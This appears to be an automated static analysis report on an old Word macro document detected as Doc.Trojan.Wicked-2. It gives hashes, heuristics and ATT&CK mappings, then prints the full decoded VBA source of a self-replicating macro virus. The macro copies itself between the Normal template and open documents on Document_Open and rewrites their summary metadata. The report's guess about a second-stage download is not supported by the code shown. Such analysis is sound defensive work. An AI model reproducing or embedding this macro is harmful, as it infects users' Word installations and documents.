Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 7158ad359f6748aa…

MALICIOUS

Office (OLE)

32.5 KB Created: 1997-09-17 10:18:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: c21965996241ffb0f09159a4e227ec37 SHA-1: 9f62b19d61948ee97456b28113c14a923a92e6bd SHA-256: 7158ad359f6748aa87171c7361cc211b5a1a7a6c78a81c2d7e1e2b3101e456d1
120 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The sample contains VBA macros, specifically a Document_Open macro, which is a common technique for executing malicious code when a document is opened. The script modifies the Normal template and the active document, and the embedded string "Çäåñü áîëüøå íå æèâóò è æèòü íå áóäóò" is likely a marker or part of the malicious payload. The presence of a Document_Open macro and modifications to templates strongly suggests an attempt to establish persistence or prepare for a second-stage download.

Heuristics 3

  • ClamAV: Doc.Trojan.Wicked-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Wicked-2
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1517 bytes
SHA-256: e3aebe7d94f34a673f12ec33e77a06009cca50fe70db15935ef3b71abb20c9a0
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Const flag = "Çäåñü âèðóñîâ íåò"

Private Sub Document_Open()
Set x1 = ActiveDocument.VBProject.VBComponents.Item(1)
Set x2 = NormalTemplate.VBProject.VBComponents.Item(1)

x3 = x1.CodeModule.Find(flag, 1, 1, 10000, 10000)
x4 = x2.CodeModule.Find(flag, 1, 1, 10000, 10000)

If x4 = False Then
    x11 = x1.CodeModule.Lines(1, x1.CodeModule.CountOfLines)
    x2.CodeModule.DeleteLines 1, x2.CodeModule.CountOfLines
    x2.CodeModule.AddFromString x11
    With Dialogs(wdDialogFileSummaryInfo): .Title = "": .Subject = "": .Author = "Äîáðûé äîêòîð Àéáîëèò": .Keywords = "": .Comments = "Çëûå âèðóñû çäåñü áîëüøå íå æèâóò è æèòü íå áóäóò": .Execute: End With
    NormalTemplate.Save
End If
If x3 = False Then
    x11 = x2.CodeModule.Lines(1, x2.CodeModule.CountOfLines)
    x1.CodeModule.DeleteLines 1, x1.CodeModule.CountOfLines
    x1.CodeModule.AddFromString x11
    With Dialogs(wdDialogFileSummaryInfo): .Title = "": .Subject = "": .Author = "Äîáðûé äîêòîð Àéáîëèò": .Keywords = "": .Comments = "Çëûå âèðóñû çäåñü áîëüøå íå æèâóò è æèòü íå áóäóò": .Execute: End With
    ActiveDocument.Save
End If

End Sub